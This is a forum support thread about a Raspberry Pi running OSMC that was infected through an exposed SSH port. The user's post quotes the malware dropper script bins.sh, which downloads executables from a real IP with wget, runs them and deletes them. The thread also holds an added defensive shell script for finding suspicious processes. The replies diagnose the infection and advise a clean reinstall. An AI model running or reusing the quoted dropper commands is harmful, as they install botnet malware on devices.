100% CPU Bins.sh

Hello - About 30 mins after each reboot of my RPi3 with the latest OSMC, all CPUs are at 100%.
I noticed that a file had been created in /tmp.

The contents of this are
???@@??@8?@???@@???P?PP??n?Q?td??H???_???H???=Y??UH??t??8?H???H??-???H??$??H??H??u??H??t bins.sh

This disappears after a reboot

The contents of bins.sh are
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.67.139/ntpd; chmod +x ntpd; ./ntpd; rm -rf ntpd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.67.139/sshd; chmod +x sshd; ./sshd; rm -rf sshd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.67.139/openssh; chmod +x openssh; ./openssh; rm -cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.67.139/telnetd; chmod +x telnetd; ./telnetd; rm -rf telnetd

There are more entries but since I am a new user I am not allowed any more than 5 links in a post!!!

Looking with htop shows a load of /tmp/kworker under /sbin/init consuming all the CPU.

Also got, under sh bins.sh, a ./ process taking 99% CPU.

OSMC is not usable for me at the moment because of 100% CPU at about 30-60 mins after restart, and the only fix is a reboot.
This happens with or without any addons.

Is this normal or perhaps a bug - the permissions of the file look corrupt to me.

Regards
J
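The two symptoms reported in this post (a "kworker" running from /tmp, and a ./ process that keeps running after the dropper deletes its binary) can be checked for directly from /proc. The following POSIX shell script is an added triage helper, not code from this thread or from OSMC; the scratch-directory list, the kernel-thread name list and the sample dropper text (which uses a documentation address instead of a live one) are assumptions made for the example.

```shell
#!/bin/sh
# Added triage helper (not from the thread or from OSMC). It flags the signs
# reported above: processes whose executable lives in a scratch directory
# such as /tmp (the dropper cd's through /tmp, /var/run, /mnt), binaries
# unlinked while still running ("./ntpd; rm -rf ntpd"), and kworker-named
# processes that have a real executable on disk. Directory list is assumed.
SCRATCH_DIRS="/tmp /var/run /mnt /dev/shm"

# Constructed sample in the shape of the posted bins.sh, using the
# documentation address 198.51.100.7 rather than a real host.
SAMPLE_DROPPER='cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.51.100.7/ntpd; chmod +x ntpd; ./ntpd; rm -rf ntpd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.51.100.7/sshd; chmod +x sshd; ./sshd; rm -rf sshd'

# is_suspicious_exe PATH: exit 0 when PATH is under a scratch directory or
# was deleted while running (readlink on /proc/PID/exe then ends in
# " (deleted)", which is exactly what the rm -rf after ./ntpd leaves behind).
is_suspicious_exe() {
  exe=$1
  [ -n "$exe" ] || return 1
  case "$exe" in
    *" (deleted)") return 0 ;;
  esac
  for d in $SCRATCH_DIRS; do
    case "$exe" in
      "$d"/*) return 0 ;;
    esac
  done
  return 1
}

# is_fake_kernel_thread COMM EXE: a genuine kworker/ksoftirqd/kthreadd has no
# /proc/PID/exe target at all (EXE is empty); one that does is a userland
# binary borrowing the name. Name list is an assumption, extend as needed.
is_fake_kernel_thread() {
  comm=$1
  exe=$2
  case "$comm" in
    kworker*|ksoftirqd*|kthreadd|migration*|rcu_*) [ -n "$exe" ] ;;
    *) return 1 ;;
  esac
}

# dropper_urls SCRIPT_TEXT: unique download URLs in a dropper, for blocking
# at the router and searching in DNS/proxy logs.
dropper_urls() {
  printf '%s\n' "$1" | grep -oE 'https?://[^[:space:];]+' | sort -u
}

# scan_procs: walk /proc and print "PID COMM EXE" for each suspicious process.
# Run as root; otherwise /proc/PID/exe of other users' processes is unreadable
# and those processes cannot be classified.
scan_procs() {
  for p in /proc/[0-9]*; do
    pid=${p#/proc/}
    comm=$(cat "$p/comm" 2>/dev/null) || continue   # process may have exited
    exe=$(readlink "$p/exe" 2>/dev/null) || exe=    # empty for kernel threads
    if is_suspicious_exe "$exe" || is_fake_kernel_thread "$comm" "$exe"; then
      printf '%s %s %s\n' "$pid" "$comm" "$exe"
    fi
  done
}

# Usage: sudo sh triage.sh
scan_procs
```

A real kernel worker shows up in htop as [kworker/0:1] with no path, so a kworker that has a path under /tmp, or a process whose exe link reads "(deleted)", is the thing to look at. The scan only tells you what is running now; as the replies below say, the fix for a box in this state is a clean reinstall, not killing the processes.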

This is not normal but also not a bug.
Your OSMC has been infected. I suggest a full clean install, and then take the respective security measures before you connect it to the Internet, and watch what you install.

This really does not look normal.
Look at this thread: RPi 1 PRIVNUT1 process - #21 by Smurphy

It rather looks like you got yourself some malware.
Having files like sshd, ntpd etc. downloaded, especially a telnet program?

Especially the cd /tmp || /var/run … it looks for a location to put the files in.

My advice is to:

  1. Wipe your OS drive clean and re-install from scratch
  2. Change the osmc user's default password
  3. Apply all updates: apt update && apt dist-upgrade
  4. Make sure this device is not accessible from the outside.

Then you should be Ok.


Many thanks. Doing a fresh image. Checking my router forwarding and changing password as suggested. Many thanks

  5. Do not port forward port 22.


There was a port forward for SSH that I put in ages ago. It is now disabled. Nothing is now forwarded to the Pi.

You have malware on your system.

Did a fresh install. Removed port forward from router. Perfect system now.
Thanks for the help